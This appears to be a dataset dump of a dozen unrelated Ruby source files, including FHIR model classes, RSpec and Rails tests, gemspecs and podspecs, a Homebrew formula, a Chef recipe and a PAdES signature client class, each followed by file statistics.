# Isotope (with its MolecularWeight) and Representation backbone elements.
class Structure < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Structure.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Structure.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Structure.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'stereochemistry' => {'type'=>'CodeableConcept', 'path'=>'Structure.stereochemistry', 'min'=>0, 'max'=>1},
'opticalActivity' => {'type'=>'CodeableConcept', 'path'=>'Structure.opticalActivity', 'min'=>0, 'max'=>1},
'molecularFormula' => {'type'=>'string', 'path'=>'Structure.molecularFormula', 'min'=>0, 'max'=>1},
'molecularFormulaByMoiety' => {'type'=>'string', 'path'=>'Structure.molecularFormulaByMoiety', 'min'=>0, 'max'=>1},
'isotope' => {'type'=>'SubstanceSpecification::Structure::Isotope', 'path'=>'Structure.isotope', 'min'=>0, 'max'=>Float::INFINITY},
'molecularWeight' => {'type'=>'SubstanceSpecification::Structure::Isotope::MolecularWeight', 'path'=>'Structure.molecularWeight', 'min'=>0, 'max'=>1},
'source' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/DocumentReference'], 'type'=>'Reference', 'path'=>'Structure.source', 'min'=>0, 'max'=>Float::INFINITY},
'representation' => {'type'=>'SubstanceSpecification::Structure::Representation', 'path'=>'Structure.representation', 'min'=>0, 'max'=>Float::INFINITY}
}
# Backbone element: Structure.isotope.
class Isotope < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Isotope.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Isotope.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Isotope.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'identifier' => {'type'=>'Identifier', 'path'=>'Isotope.identifier', 'min'=>0, 'max'=>1},
'name' => {'type'=>'CodeableConcept', 'path'=>'Isotope.name', 'min'=>0, 'max'=>1},
'substitution' => {'type'=>'CodeableConcept', 'path'=>'Isotope.substitution', 'min'=>0, 'max'=>1},
'halfLife' => {'type'=>'Quantity', 'path'=>'Isotope.halfLife', 'min'=>0, 'max'=>1},
'molecularWeight' => {'type'=>'SubstanceSpecification::Structure::Isotope::MolecularWeight', 'path'=>'Isotope.molecularWeight', 'min'=>0, 'max'=>1}
}
# Backbone element: Structure.isotope.molecularWeight. 'method' is exposed
# via local_name :local_method to avoid clashing with Object#method.
class MolecularWeight < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'MolecularWeight.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'MolecularWeight.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'MolecularWeight.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'method' => {'local_name'=>'local_method', 'type'=>'CodeableConcept', 'path'=>'MolecularWeight.method', 'min'=>0, 'max'=>1},
'type' => {'type'=>'CodeableConcept', 'path'=>'MolecularWeight.type', 'min'=>0, 'max'=>1},
'amount' => {'type'=>'Quantity', 'path'=>'MolecularWeight.amount', 'min'=>0, 'max'=>1}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :local_method # 0-1 CodeableConcept
attr_accessor :type # 0-1 CodeableConcept
attr_accessor :amount # 0-1 Quantity
end
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :identifier # 0-1 Identifier
attr_accessor :name # 0-1 CodeableConcept
attr_accessor :substitution # 0-1 CodeableConcept
attr_accessor :halfLife # 0-1 Quantity
attr_accessor :molecularWeight # 0-1 SubstanceSpecification::Structure::Isotope::MolecularWeight
end
# Backbone element: Structure.representation (e.g. SMILES/InChI strings or
# attached structure files).
class Representation < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Representation.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Representation.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Representation.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'type' => {'type'=>'CodeableConcept', 'path'=>'Representation.type', 'min'=>0, 'max'=>1},
'representation' => {'type'=>'string', 'path'=>'Representation.representation', 'min'=>0, 'max'=>1},
'attachment' => {'type'=>'Attachment', 'path'=>'Representation.attachment', 'min'=>0, 'max'=>1}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :type # 0-1 CodeableConcept
attr_accessor :representation # 0-1 string
attr_accessor :attachment # 0-1 Attachment
end
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :stereochemistry # 0-1 CodeableConcept
attr_accessor :opticalActivity # 0-1 CodeableConcept
attr_accessor :molecularFormula # 0-1 string
attr_accessor :molecularFormulaByMoiety # 0-1 string
attr_accessor :isotope # 0-* [ SubstanceSpecification::Structure::Isotope ]
attr_accessor :molecularWeight # 0-1 SubstanceSpecification::Structure::Isotope::MolecularWeight
attr_accessor :source # 0-* [ Reference(DocumentReference) ]
attr_accessor :representation # 0-* [ SubstanceSpecification::Structure::Representation ]
end
class Code < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Code.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Code.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Code.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'code' => {'type'=>'CodeableConcept', 'path'=>'Code.code', 'min'=>0, 'max'=>1},
'status' => {'type'=>'CodeableConcept', 'path'=>'Code.status', 'min'=>0, 'max'=>1},
'statusDate' => {'type'=>'dateTime', 'path'=>'Code.statusDate', 'min'=>0, 'max'=>1},
'comment' => {'type'=>'string', 'path'=>'Code.comment', 'min'=>0, 'max'=>1},
'source' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/DocumentReference'], 'type'=>'Reference', 'path'=>'Code.source', 'min'=>0, 'max'=>Float::INFINITY}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :code # 0-1 CodeableConcept
attr_accessor :status # 0-1 CodeableConcept
attr_accessor :statusDate # 0-1 dateTime
attr_accessor :comment # 0-1 string
attr_accessor :source # 0-* [ Reference(DocumentReference) ]
end
class Name < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Name.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Name.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Name.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'name' => {'type'=>'string', 'path'=>'Name.name', 'min'=>1, 'max'=>1},
'type' => {'type'=>'CodeableConcept', 'path'=>'Name.type', 'min'=>0, 'max'=>1},
'status' => {'type'=>'CodeableConcept', 'path'=>'Name.status', 'min'=>0, 'max'=>1},
'preferred' => {'type'=>'boolean', 'path'=>'Name.preferred', 'min'=>0, 'max'=>1},
'language' => {'type'=>'CodeableConcept', 'path'=>'Name.language', 'min'=>0, 'max'=>Float::INFINITY},
'domain' => {'type'=>'CodeableConcept', 'path'=>'Name.domain', 'min'=>0, 'max'=>Float::INFINITY},
'jurisdiction' => {'type'=>'CodeableConcept', 'path'=>'Name.jurisdiction', 'min'=>0, 'max'=>Float::INFINITY},
'synonym' => {'type'=>'SubstanceSpecification::Name', 'path'=>'Name.synonym', 'min'=>0, 'max'=>Float::INFINITY},
'translation' => {'type'=>'SubstanceSpecification::Name', 'path'=>'Name.translation', 'min'=>0, 'max'=>Float::INFINITY},
'official' => {'type'=>'SubstanceSpecification::Name::Official', 'path'=>'Name.official', 'min'=>0, 'max'=>Float::INFINITY},
'source' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/DocumentReference'], 'type'=>'Reference', 'path'=>'Name.source', 'min'=>0, 'max'=>Float::INFINITY}
}
class Official < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
METADATA = {
'id' => {'type'=>'string', 'path'=>'Official.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Official.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Official.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'authority' => {'type'=>'CodeableConcept', 'path'=>'Official.authority', 'min'=>0, 'max'=>1},
'status' => {'type'=>'CodeableConcept', 'path'=>'Official.status', 'min'=>0, 'max'=>1},
'date' => {'type'=>'dateTime', 'path'=>'Official.date', 'min'=>0, 'max'=>1}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :authority # 0-1 CodeableConcept
attr_accessor :status # 0-1 CodeableConcept
attr_accessor :date # 0-1 dateTime
end
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :name # 1-1 string
attr_accessor :type # 0-1 CodeableConcept
attr_accessor :status # 0-1 CodeableConcept
attr_accessor :preferred # 0-1 boolean
attr_accessor :language # 0-* [ CodeableConcept ]
attr_accessor :domain # 0-* [ CodeableConcept ]
attr_accessor :jurisdiction # 0-* [ CodeableConcept ]
attr_accessor :synonym # 0-* [ SubstanceSpecification::Name ]
attr_accessor :translation # 0-* [ SubstanceSpecification::Name ]
attr_accessor :official # 0-* [ SubstanceSpecification::Name::Official ]
attr_accessor :source # 0-* [ Reference(DocumentReference) ]
end
class Relationship < FHIR::Model
include FHIR::Hashable
include FHIR::Json
include FHIR::Xml
MULTIPLE_TYPES = {
'substance' => ['Reference', 'CodeableConcept'],
'amount' => ['Quantity', 'Range', 'Ratio', 'string']
}
METADATA = {
'id' => {'type'=>'string', 'path'=>'Relationship.id', 'min'=>0, 'max'=>1},
'extension' => {'type'=>'Extension', 'path'=>'Relationship.extension', 'min'=>0, 'max'=>Float::INFINITY},
'modifierExtension' => {'type'=>'Extension', 'path'=>'Relationship.modifierExtension', 'min'=>0, 'max'=>Float::INFINITY},
'substanceReference' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/SubstanceSpecification'], 'type'=>'Reference', 'path'=>'Relationship.substance[x]', 'min'=>0, 'max'=>1},
'substanceCodeableConcept' => {'type'=>'CodeableConcept', 'path'=>'Relationship.substance[x]', 'min'=>0, 'max'=>1},
'relationship' => {'type'=>'CodeableConcept', 'path'=>'Relationship.relationship', 'min'=>0, 'max'=>1},
'isDefining' => {'type'=>'boolean', 'path'=>'Relationship.isDefining', 'min'=>0, 'max'=>1},
'amountQuantity' => {'type'=>'Quantity', 'path'=>'Relationship.amount[x]', 'min'=>0, 'max'=>1},
'amountRange' => {'type'=>'Range', 'path'=>'Relationship.amount[x]', 'min'=>0, 'max'=>1},
'amountRatio' => {'type'=>'Ratio', 'path'=>'Relationship.amount[x]', 'min'=>0, 'max'=>1},
'amountString' => {'type'=>'string', 'path'=>'Relationship.amount[x]', 'min'=>0, 'max'=>1},
'amountRatioLowLimit' => {'type'=>'Ratio', 'path'=>'Relationship.amountRatioLowLimit', 'min'=>0, 'max'=>1},
'amountType' => {'type'=>'CodeableConcept', 'path'=>'Relationship.amountType', 'min'=>0, 'max'=>1},
'source' => {'type_profiles'=>['http://hl7.org/fhir/StructureDefinition/DocumentReference'], 'type'=>'Reference', 'path'=>'Relationship.source', 'min'=>0, 'max'=>Float::INFINITY}
}
attr_accessor :id # 0-1 string
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :substanceReference # 0-1 Reference(SubstanceSpecification)
attr_accessor :substanceCodeableConcept # 0-1 CodeableConcept
attr_accessor :relationship # 0-1 CodeableConcept
attr_accessor :isDefining # 0-1 boolean
attr_accessor :amountQuantity # 0-1 Quantity
attr_accessor :amountRange # 0-1 Range
attr_accessor :amountRatio # 0-1 Ratio
attr_accessor :amountString # 0-1 string
attr_accessor :amountRatioLowLimit # 0-1 Ratio
attr_accessor :amountType # 0-1 CodeableConcept
attr_accessor :source # 0-* [ Reference(DocumentReference) ]
end
attr_accessor :id # 0-1 id
attr_accessor :meta # 0-1 Meta
attr_accessor :implicitRules # 0-1 uri
attr_accessor :language # 0-1 code
attr_accessor :text # 0-1 Narrative
attr_accessor :contained # 0-* [ Resource ]
attr_accessor :extension # 0-* [ Extension ]
attr_accessor :modifierExtension # 0-* [ Extension ]
attr_accessor :identifier # 0-1 Identifier
attr_accessor :type # 0-1 CodeableConcept
attr_accessor :status # 0-1 CodeableConcept
attr_accessor :domain # 0-1 CodeableConcept
attr_accessor :description # 0-1 string
attr_accessor :source # 0-* [ Reference(DocumentReference) ]
attr_accessor :comment # 0-1 string
attr_accessor :moiety # 0-* [ SubstanceSpecification::Moiety ]
attr_accessor :property # 0-* [ SubstanceSpecification::Property ]
attr_accessor :referenceInformation # 0-1 Reference(SubstanceReferenceInformation)
attr_accessor :structure # 0-1 SubstanceSpecification::Structure
attr_accessor :code # 0-* [ SubstanceSpecification::Code ]
attr_accessor :name # 0-* [ SubstanceSpecification::Name ]
attr_accessor :molecularWeight # 0-* [ SubstanceSpecification::Structure::Isotope::MolecularWeight ]
attr_accessor :relationship # 0-* [ SubstanceSpecification::Relationship ]
attr_accessor :nucleicAcid # 0-1 Reference(SubstanceNucleicAcid)
attr_accessor :polymer # 0-1 Reference(SubstancePolymer)
attr_accessor :protein # 0-1 Reference(SubstanceProtein)
attr_accessor :sourceMaterial # 0-1 Reference(SubstanceSourceMaterial)
def resourceType
'SubstanceSpecification'
end
end
end | 67.829268 | 651 | 0.585001 |
3942c6a5a75b1773afc55cb0d15e102e954492bf | 388 | require 'spec_helper'
# Behavioural spec for Telecine::Registry: it must satisfy the shared
# "a Registry" example group, accept a default value at construction,
# and not expose Hash's own interface directly.
describe Telecine::Registry do
  it_should_behave_like "a Registry"
  it 'should take hash default arg' do
    # The constructor argument becomes the default returned for any key.
    subject = described_class.new("foo")
    subject.get(:foo).should == "foo"
  end
  it 'should not respond to hash methods' do
    # Hash-style accessors must stay private to the registry.
    [:fetch, :store, :delete, :[], :[]=].each do |method|
      subject.respond_to?(method).should be_false
    end
  end
end
| 22.823529 | 57 | 0.675258 |
79a370a31c77b7fca20f14e492d1ea052defcc30 | 1,632 | #
# Be sure to run `pod lib lint PQSearchControl.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
# TODO(review): summary and description below are still the template
# placeholders generated by `pod lib create`; replace them before
# publishing (`pod lib lint` warns about the default summary).
Pod::Spec.new do |s|
  s.name = 'PQSearchControl'
  s.version = '0.1.0'
  s.summary = 'A short description of PQSearchControl.'
# This description is used to generate tags and improve search results.
#   * Think: What does it do? Why did you write it? What is the focus?
#   * Try to keep it short, snappy and to the point.
#   * Write the description between the DESC delimiters below.
#   * Finally, don't worry about the indent, CocoaPods strips it!
  s.description = <<-DESC
TODO: Add long description of the pod here.
                       DESC
  s.homepage = 'https://github.com/zoudike/PQSearchControl.git'
  # s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
  s.license = { :type => 'MIT', :file => 'LICENSE' }
  s.author = { 'zoudike' => '[email protected]' }
  s.source = { :git => 'https://github.com/zoudike/PQSearchControl.git', :tag => s.version.to_s }
  # s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
  s.ios.deployment_target = '8.0'
  s.source_files = 'PQSearchControl/Classes/**/*'
  # s.resource_bundles = {
  #   'PQSearchControl' => ['PQSearchControl/Assets/*.png']
  # }
  # s.public_header_files = 'Pod/Classes/**/*.h'
  # s.frameworks = 'UIKit', 'MapKit'
  # s.dependency 'AFNetworking', '~> 2.3'
end
| 37.953488 | 107 | 0.645221 |
396d5e71da0c0130a54dcdf2b5882815ad67283a | 524 | require_relative "../task"
require_relative "metrics"
# Rewrites the ASCENT/DESCENT constants inside the generated font class
# file so they match the current values reported by Metrics.
class UpdateMetricsTask < Task
  # Announce the target file, compute the patched source and write it back.
  def run
    puts "* Updating #{font_class_path}"
    patched = updated_font_class
    open_file(font_class_path, "w") do |f|
      f.write patched
    end
  end

  # Current font-class source with both metric constants substituted.
  def updated_font_class
    font_class
      .sub(/ASCENT = \d+/, "ASCENT = #{Metrics.ascent}")
      .sub(/DESCENT = -\d+/, "DESCENT = #{Metrics.descent}")
  end

  # Raw contents of the font class file (via the Task helper).
  def font_class
    open_file(font_class_path)
  end

  # Location of the generated font class within the project.
  def font_class_path
    "lib/font_awesome/font.rb"
  end
end
| 20.153846 | 118 | 0.683206 |
f786f82f8599019daf1185cd72af658feb1c45d3 | 1,989 | require_relative '../parser.rb'
RSpec.describe "Parser" do
context "deals with query strings" do
before do
request = instance_double("Request", :uri => "GET /home?first=Burt&last=Malkiel")
@parser = Parser.new(request)
end
it "returns the method of an URI" do
expect(@parser.http_method).to eq("GET")
end
it "returns the route of an URI" do
expect(@parser.resource).to eq("/home")
end
it "returns query parameters of an URI" do
expect(@parser.parameters["first"]).to eq("Burt")
expect(@parser.parameters["last"]).to eq("Malkiel")
end
end
context "deals with no query strings" do
before do
request = instance_double("Request", :uri => "GET /home")
@parser = Parser.new(request)
end
it "returns query parameters of an URI" do
expect(@parser.parameters).to eq({})
end
end
context "handles invalid query strings" do
before do
request = instance_double("Request", :uri => "GET /home?first")
@parser = Parser.new(request)
end
it "returns default query parameters" do
expect(@parser.parameters).to eq({})
end
end
context "handles POST requests" do
before do
request = instance_double("Request", :uri => "POST /home", :headers => { "content" => "user=cat&password=dog"})
@parser = Parser.new(request)
end
it "returns the method of a POST request successfully" do
expect(@parser.http_method).to eq("POST")
end
it "returns the post body of the request" do
expect(@parser.parameters).to eq({ "user" => "cat", "password" => "dog" })
end
end
context "Handle URI encoding" do
before do
request = instance_double("Request", :uri => "GET /home?first=foobar&last=%261234%26")
@parser = Parser.new(request)
end
it "can successfully decode URI encoded strings" do
expect(@parser.parameters).to eq({ "first" => "foobar", "last" => "&1234&"})
end
end
end | 26.171053 | 117 | 0.63097 |
333abc9d7a21a76c837431f489803761eea15e0c | 949 | require "test_helper"
class UserMailerTest < ActionMailer::TestCase
  # The activation mail must target the right user and embed both the
  # activation token and the CGI-escaped address in its body.
  test "account_activation" do
    recipient = users(:michael)
    recipient.activation_token = User.new_token
    message = UserMailer.account_activation(recipient)
    assert_equal "Account activation", message.subject
    assert_equal [recipient.email], message.to
    assert_equal ["[email protected]"], message.from
    assert_match recipient.name, message.body.encoded
    assert_match recipient.activation_token, message.body.encoded
    assert_match CGI.escape(recipient.email), message.body.encoded
  end

  # The password-reset mail must embed the reset token and the
  # CGI-escaped address in its body.
  test "password_reset" do
    recipient = users(:michael)
    recipient.reset_token = User.new_token
    message = UserMailer.password_reset(recipient)
    assert_equal "Password reset", message.subject
    assert_equal [recipient.email], message.to
    assert_equal ["[email protected]"], message.from
    assert_match recipient.reset_token, message.body.encoded
    assert_match CGI.escape(recipient.email), message.body.encoded
  end
end
| 33.892857 | 59 | 0.726027 |
217c985bdde5f6db0d40900d4a433ecf18fa2460 | 1,120 | require "./lib/paginate/version"
# Gem specification for the paginate library; the version constant
# comes from lib/paginate/version (required above).
Gem::Specification.new do |s|
  s.name = "paginate"
  s.version = Paginate::Version::STRING
  s.platform = Gem::Platform::RUBY
  s.authors = ["Nando Vieira"]
  s.email = ["[email protected]"]
  s.homepage = "http://rubygems.org/gems/paginate"
  s.summary = "Paginate collections using SIZE+1 to determine if there is a next page. Includes ActiveRecord and ActionView support."
  s.description = s.summary
  s.required_ruby_version = ">= 2.0.0"

  # File lists are derived from git so packaging matches the repository.
  s.files = `git ls-files`.split("\n")
  s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
  s.executables = `git ls-files -- bin/*`.split("\n").map{ |f| File.basename(f) }
  s.require_paths = ["lib"]

  s.add_development_dependency "nokogiri"
  s.add_development_dependency "sqlite3-ruby"
  s.add_development_dependency "rails"
  s.add_development_dependency "minitest", "~> 5.1"
  s.add_development_dependency "minitest-utils"
  s.add_development_dependency "pry-meta"
  s.add_development_dependency "mocha"
  s.add_development_dependency "codeclimate-test-reporter"
end
| 40 | 137 | 0.692857 |
26588d3cfd558175da0f501d8378e22a75307298 | 166 | class CreateAmenityLists < ActiveRecord::Migration
def change
create_table :amenity_lists do |t|
t.boolean :wifi
t.boolean :couch
end
end
end
| 18.444444 | 50 | 0.692771 |
1c8ee65d3a9c4b3d1431c069795992de2cfb6987 | 1,463 | require 'spec_helper'
# Minimal concrete subclass used to exercise the abstract platform
# ResourceController against a simple model (Spree::Address).
class PlatformApiDummyController < Spree::Api::V2::Platform::ResourceController
  private
  # Template methods the base controller resolves at runtime:
  # the model being served and the base query scope.
  def model_class
    Spree::Address
  end
  def scope
    Spree::Address
  end
end
# Exercises ResourceController's private helpers through the dummy
# subclass; `send` is used because the helpers are private.
describe Spree::Api::V2::Platform::ResourceController, type: :controller do
  let(:dummy_controller) { PlatformApiDummyController.new }

  # Serializer lookup is derived from the model class (Spree::Address).
  describe '#resource_serializer' do
    it { expect(dummy_controller.send(:resource_serializer)).to be Spree::Api::V2::Platform::AddressSerializer }
  end

  describe '#collection_serializer' do
    it { expect(dummy_controller.send(:collection_serializer)).to be Spree::Api::V2::Platform::AddressSerializer }
  end

  # With one persisted address, the collection is an AR relation of size 1.
  describe '#collection' do
    before do
      create(:address)
      dummy_controller.params = {}
    end

    let(:collection) { dummy_controller.send(:collection) }

    it { expect(collection).to be_instance_of(Spree::Address.const_get(:ActiveRecord_Relation)) }
    it { expect(collection.first).to be_instance_of(Spree::Address) }
    it { expect(collection.count).to eq(1) }
  end

  # Strong-parameters filtering must mirror require(:address).permit!.
  describe '#permitted_resource_params' do
    let(:valid_attributes) do
      {
        address: {
          firstname: 'John',
          lastname: 'Snow'
        }
      }
    end

    before do
      dummy_controller.params = valid_attributes
    end

    it { expect(dummy_controller.send(:permitted_resource_params)).to eq(ActionController::Parameters.new(valid_attributes).require(:address).permit!) }
  end
end
| 26.125 | 152 | 0.704033 |
e888ba1f2ed9df45985d465a839c235379730743 | 640 | class AmmoniteRepl < Formula
desc "Ammonite is a cleanroom re-implementation of the Scala REPL"
homepage "https://lihaoyi.github.io/Ammonite/#Ammonite-REPL"
url "https://github.com/lihaoyi/Ammonite/releases/download/1.8.2/2.12-1.8.2"
sha256 "378d7a9fa1a8f44f8e27769259a465423cf540658ba42365213a3c00e4a8acc0"
bottle :unneeded
depends_on :java => "1.8+"
def install
libexec.install Dir["*"].shift => "amm"
chmod 0555, libexec/"amm"
bin.install_symlink libexec/"amm"
end
test do
output = shell_output("#{bin}/amm -c 'print(\"hello world!\")'")
assert_equal "hello world!", output.lines.last
end
end
| 29.090909 | 78 | 0.714063 |
08e8eceff7b3e46951b39e1849443ab6430d707e | 382 | tarball = 'go1.4.2.linux-arm~multiarch-armv7-1.tar.gz'
# Local cache location for the downloaded Go tarball.
tarball_path = ::File.join(Chef::Config[:file_cache_path], tarball)
# Download once (create_if_missing); a fresh download notifies the
# extraction resource below (default delayed timing).
remote_file tarball_path do
  source "http://dave.cheney.net/paste/#{tarball}"
  action :create_if_missing
  notifies :run, 'execute[decompress_tarball]'
end
# Extraction only runs when notified by the download above (:nothing).
execute 'decompress_tarball' do
  command "tar -zxf #{tarball_path} -C /opt"
  action :nothing
end
| 27.285714 | 67 | 0.748691 |
bb276c46f1d9995cd54ff73a244b216bc11c1c7e | 2,585 | require 'fast_spec_helper'
require 'active_support/core_ext/object/blank'
require 'epi_cas/ldap_info'
# LdapInfo resolves user attributes from LDAP, falling back to the
# local database when LDAP is unavailable or the system is read-only.
describe EpiCas::LdapInfo do
  subject { EpiCas::LdapInfo.new('username', double(find_by_username: double(uid: "abc", givenname: "test", sn: "user", mail: "[email protected]", dn: "dn", ou: "EPG"))) }

  describe '#get_ldap_info' do
    describe 'Getting info from LDAP' do
      it "gets the info from ldap server when a user can be found" do
        # LDAP returns attributes as single-element arrays; the result
        # is flattened to scalar values keyed by symbol.
        allow(subject).to receive(:ldap_finder){ double(lookup: { 'uid' => ['abc'], 'givenname' => ['test'], 'sn' => ['user'], 'mail' => ['[email protected]'], 'dn' => ['dn'], 'ou' => ['EPG'] }) }
        expect(subject.send(:get_ldap_info, double(read_only: false))).to eq ({
          uid: "abc",
          givenname: "test",
          sn: "user",
          mail: "[email protected]",
          dn: "dn",
          ou: "EPG"
        })
      end
      it "returns empty hash if user cannot be found" do
        allow(subject).to receive(:ldap_finder){ double(lookup: { }) }
        expect(subject.send(:get_ldap_info, double(read_only: false))).to eq ({})
      end
    end
    describe 'LDAP server down' do
      before do
        # Simulate an LDAP outage with an arbitrary raised error.
        class FakeLdapError < StandardError; end
        ldap_finder = double
        allow(ldap_finder).to receive(:lookup).and_raise(FakeLdapError)
        allow(subject).to receive(:ldap_finder){ ldap_finder }
      end
      it 'uses the existing data in database if LDAP server fails to work' do
        expect(subject).to receive(:get_ldap_info_from_database)
        subject.send(:get_ldap_info, double(read_only: false))
      end
      it "returns empty hash if user does not already exist" do
        expect(subject).to receive(:get_ldap_info_from_database){ {} }
        expect(subject.send(:get_ldap_info, double(read_only: false))).to eq ({})
      end
    end
    describe 'When the system is read only' do
      it 'uses the existing data in database' do
        expect(subject).to receive(:get_ldap_info_from_database)
        subject.send(:get_ldap_info, double(read_only: true))
      end
    end
  end

  describe '#get_ldap_info_from_database' do
    it 'finds the user in database and returns the LDAP information' do
      user_class = double(find_by_username: double(uid: 'abc', givenname: 'test', sn: 'user', mail: '[email protected]', dn: 'dn', ou: 'EPG'))
      expect(subject.send(:get_ldap_info_from_database, user_class)).to eq ({
        uid: "abc",
        givenname: "test",
        sn: "user",
        mail: "[email protected]",
        dn: "dn",
        ou: "EPG"
      })
    end
  end
end
| 36.928571 | 192 | 0.622824 |
f8095a74ca15aea773e0ae261bb2b8d87af2daca | 3,684 | require 'base64'
module RestPki
class PadesSignatureStarter < SignatureStarter
attr_accessor :visual_representation
def initialize(restpki_client)
super(restpki_client)
@pdf_content_base64 = nil
@visual_representation = nil
end
#region set_pdf_tosign
def set_pdf_tosign_from_path(pdf_path)
file = File.open(pdf_path, 'rb')
@pdf_content_base64 = Base64.encode64(file.read)
file.close
@pdf_content_base64
end
def set_pdf_tosign_from_raw(content_raw)
@pdf_content_base64 = Base64.encode64(content_raw)
end
def set_pdf_tosign_from_base64(content_base64)
@pdf_content_base64 = content_base64
end
def set_pdf_content_tosign(content_raw)
set_pdf_tosign_from_raw(content_raw)
end
def set_pdf_file_tosign(pdf_path)
set_pdf_tosign_from_path(pdf_path)
end
#endregion
def start_with_webpki
if @pdf_content_base64.to_s.blank?
raise 'The PDF to sign was not set'
end
if @signature_policy_id.to_s.blank?
raise 'The signature policy was not set'
end
request = {
securityContextId: @security_context_id,
pdfToSign: @pdf_content_base64,
signaturePolicyId: @signature_policy_id,
callbackArgument: @callback_argument,
visualRepresentation: @visual_representation,
ignoreRevocationStatusUnknown: @ignore_revocation_status_unknown
}
unless @signer_certificate_base64.to_s.blank?
request['certificate'] = Base64.encode64(@signer_certificate_base64)
end
response = @restpki_client.post('Api/PadesSignatures', request, 'pades_model')
unless response['certificate'].nil?
@certificate = response['certificate']
end
@done = true
response['token']
end
def start
if @pdf_content_base64.to_s.blank?
raise 'The PDF to sign was not set'
end
if @signature_policy_id.to_s.blank?
raise 'The signature policy was not set'
end
if @signer_certificate_base64.to_s.blank?
raise 'The signer certificate was not set'
end
request = {
securityContextId: @security_context_id,
pdfToSign: @pdf_content_base64,
signaturePolicyId: @signature_policy_id,
callbackArgument: @callback_argument,
visualRepresentation: @visual_representation,
ignoreRevocationStatusUnknown: @ignore_revocation_status_unknown
}
unless @signer_certificate_base64.to_s.blank?
request['certificate'] = Base64.encode64(@signer_certificate_base64)
end
response = @restpki_client.post('Api/PadesSignatures', request, 'pades_model')
unless response['certificate'].nil?
@certificate = response['certificate']
end
@done = true
{
:token => response['token'],
:to_sign_data => response['toSignData'],
:to_sign_hash => response['toSignHash'],
:digest_algorithm_oid => response['digestAlgorithmOid'],
:signature_algorithm => get_signature_algorithm(response['digestAlgorithmOid'])
}
end
end
end | 33.490909 | 95 | 0.586048 |
265296984d845c300baf86a02139d719c6bf65be | 368 | #
# = config/initializers/annotation_security.rb
#
# Sets up files under <tt>config/security</tt> which hold
# the security configuration.
#
# Add your own files here if they should also be loaded.
#
# Load the security configuration files from config/security:
# relation definitions first, then the rights that build on them.
AnnotationSecurity.load_relations('relations')
AnnotationSecurity.load_rights('rights')
# AnnotationSecurity.load_rights('rights', 'rb') # loads rights from a ruby file
abb81602de1857d37b1fd65de66fdadea4c01609 | 1,018 | require "spec_helper"
# Verifies that the RSS product feed picks up the store's name, URL and
